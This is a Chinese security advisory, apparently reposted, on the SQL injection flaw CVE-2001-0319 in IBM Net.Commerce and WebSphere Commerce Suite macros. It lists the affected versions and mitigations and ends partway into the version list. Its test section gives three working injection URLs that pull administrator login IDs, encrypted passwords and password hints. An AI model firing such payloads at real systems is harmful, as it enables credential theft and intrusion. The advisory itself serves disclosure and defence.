IBM Net.Commerce远程执行任意命令漏洞

2008-04-10 03:05:07来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

IBM Net.Commerce远程执行任意命令漏洞

发布日期:2001-02-05
更新日期:2001-02-05

受影响系统:
IBM Net.Commerce 3.0
IBM Net.Commerce 2.0
IBM Net.Commerce Hosting Server 3.2
IBM Net.Commerce Hosting Server 3.1.2
IBM Net.Commerce Hosting Server 3.1.1
IBM Net.Commerce Pro 3.2
IBM Net.Commerce Pro 3.1.2
IBM Net.Commerce Pro 3.1.1
IBM Net.Commerce Pro 3.1
IBM Net.Commerce Start 3.2
IBM Net.Commerce Start 3.1.2
IBM Net.Commerce Start 3.1.1
IBM Net.Commerce Start 3.1
IBM WebSphere Commerce Suite MarketPlace 4.1
IBM WebSphere Commerce Suite Pro 4.1.1
IBM WebSphere Commerce Suite Pro 4.1
IBM WebSphere Commerce Suite Service Provider 3.2
IBM WebSphere Commerce Suite Service Provider 3.1.2
IBM WebSphere Commerce Suite Start 4.1.1
IBM WebSphere Commerce Suite Start 4.1
不受影响系统:
IBM WebSphere Commerce Suite Pro 5.1
IBM WebSphere Commerce Suite Start 5.1
描述:
BUGTRAQ ID: 2350
CVE(CAN) ID: CVE-2001-0319

Net.Commerce是IBM发行的Websphere的一部分。它提供了一些通用特性使电子商务变得更加容易,其性能和可靠性也有独到之处。

它默认支持的宏特性未对用户输入进行适当的检查,远程攻击者可以利用SQL Injection技术以帐号DB2INST1的权限执行任意SHELL命令。

IBM已经修正了随Net.Commerce 3.2、WebSphere Commerce Suite 4.1发布的有安全漏洞的宏,但是用户自定义宏可能存在同样的安全漏洞。WebSphere Commerce Suite 5.1不受此问题影响,它不使用Net.Data宏。


<*来源:rudi carell (rudicarell@hotmail.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=98140167310183&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

rudi carell (rudicarell@hotmail.com)提供了如下测试方法:

提交如下URL请求可以获取administrator帐号权限

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999 union select shlogid as mestname,0 from shopper where shshtyp = 'A';

提交如下URL请求可以获取加密后的口令

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999 union select shlpswd as mestname,0 from shopper where shlogid = 'ncadmin';

提交如下URL请求可以获取口令提示

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999 union select shchaans as mestname,0 from shopper where shlogid = 'ncadmin';

"orderdspc.d2w"并非惟一的存在安全漏洞的宏,上述URL请求仅仅是一部分例子,还有很多其它利用方法。

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 按照如下步骤删除示例宏:

1. 在WEB根目录中找到每个实例对应的db2www.ini 。

2. 检查这些ini文件中的MACRO_PATH,确认只包含用到了的宏,删除示例宏。

3. 删除那些未被用到的目录。

下列目录包含了一些应该被删除的示例代码,如果您需要使用其中一些示例宏,务必仔细修改源码,对用户输入进行适当的检查。

Websphere Commerce Suite and Market Place Edition Version 4.1/4.1.1:

SUN Solaris

/opt/WebSphere/CommerceSuite/macro/en_US/base
/opt/WebSphere/CommerceSuite/macro/en_US/bus2bus
/opt/WebSphere/CommerceSuite/macro/en_US/category
/opt/WebSphere/CommerceSuite/macro/en_US/demomall
/opt/WebSphere/CommerceSuite/macro/en_US/euromall
/opt/WebSphere/CommerceSuite/macro/en_US/grocery
/opt/WebSphere/CommerceSuite/macro/en_US/product
/opt/WebSphere/CommerceSuite/macro/en_US/tutorial
/opt/WebSphere/CommerceSuite/models

IBM AIX

/usr/lpp/CommerceSuite/macro/en_US/base
/usr/lpp/CommerceSuite/macro/en_US/bus2bus
/usr/lpp/CommerceSuite/macro/en_US/category
/usr/lpp/CommerceSuite/macro/en_US/demomall
/usr/lpp/CommerceSuite/macro/en_US/euromall
/usr/lpp/CommerceSuite/macro/en_US/grocery
/usr/lpp/CommerceSuite/macro/en_US/product
/usr/lpp/CommerceSuite/macro/en_US/tutorial /usr/lpp/CommerceSuite/models

Windows NT

IBM\CommerceSuite\macro\en_US\base IBM\CommerceSuite\macro\en_US\bus2bus
IBM\CommerceSuite\macro\en_US\category
IBM\CommerceSuite\macro\en_US\demomall
IBM\CommerceSuite\macro\en_US\euromall
IBM\CommerceSuite\macro\en_US\grocery IBM\CommerceSuite\macro\en_US\product
IBM\CommerceSuite\macro\en_US\ncsample
IBM\CommerceSuite\macro\en_US\tutorial
IBM\CommerceSuite\models IBM\CommerceSuite\instance\<instancename>\teditor

Net.Commerce/Service Provider Edition Version 3.2

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Win2000 RDP拒绝服务漏洞

下一篇:Cisco Content Service Switch 长文件名拒绝服务漏洞